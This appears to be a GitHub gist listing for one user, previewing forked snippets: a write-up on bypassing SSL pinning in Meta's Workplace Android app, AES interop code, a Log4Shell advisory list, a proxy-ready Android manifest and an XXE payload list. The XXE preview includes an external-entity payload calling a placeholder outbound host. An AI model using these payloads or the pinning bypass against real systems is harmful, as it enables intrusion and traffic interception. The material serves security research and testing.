@TrueNix
TrueNix / wokplace-ssl-pinning-bypass.md
Created September 26, 2023 11:50 — forked from xdavidhu/wokplace-ssl-pinning-bypass.md
Bypassing SSL Pinning in Facebook/Meta Workplace (Android)

Tested on Workplace for Android version 362.0.0.29.109. This approach might work in other Facebook/Meta applications. Thank you Imre Rad for helping me analyze the binary.

How does it work?

The Workplace Android app uses the Fizz open source TLS-1.3 library to communicate with the backend APIs. This library is written in C++, and is compiled to native code. It is running as a native library attached to the Android app.

The certificate verification is implemented in fizz/client/ClientProtocol.cpp, on line 1944. The easiest way to bypass this check is to patch the if (state.verifier()) { check on line 1942.

TrueNix / aes_cryptojs_pycrypto.js
Created June 22, 2022 12:47 — forked from adrianlzt/aes_cryptojs_pycrypto.js
Interoperable CryptoJS (defaults) <-> PyCrypto
/*
* CryptoJS by default:
* - uses CBC mode
* - pkcs7 for padding
* - evpKDF to extract key
* - part of the key is used as IV
* - before converting to base64 it makes "Salted__"+salt+encrypted_text
*/
var CryptoJS = require('crypto-js');
TrueNix / CryptoJS-AES.md
Created June 22, 2022 06:30 — forked from caiguanhao/CryptoJS-AES.md
CryptoJS AES encryption/decryption JavaScript and command line examples

You can run these commands to encrypt or decrypt a string:

Command

To encrypt:

printf "Lorem ipsum dolor sit amet, ..." | \
  openssl enc -e -base64 -A -aes-256-cbc -pass pass:"my-password"

To decrypt:

TrueNix / 20211210-TLP-WHITE_LOG4J.md
Created December 14, 2021 07:31 — forked from SwitHak/20211210-TLP-WHITE_LOG4J.md
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-14 0006 UTC

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

TrueNix / AndroidManifest.xml
Created November 21, 2017 10:00 — forked from erkattak/AndroidManifest.xml
Android Application Setup for use with Charles Proxy
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
android:theme="@style/AppTheme"
android:networkSecurityConfig="@xml/network_security_config">
TrueNix / XXE_payloads
Created August 29, 2017 11:19 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>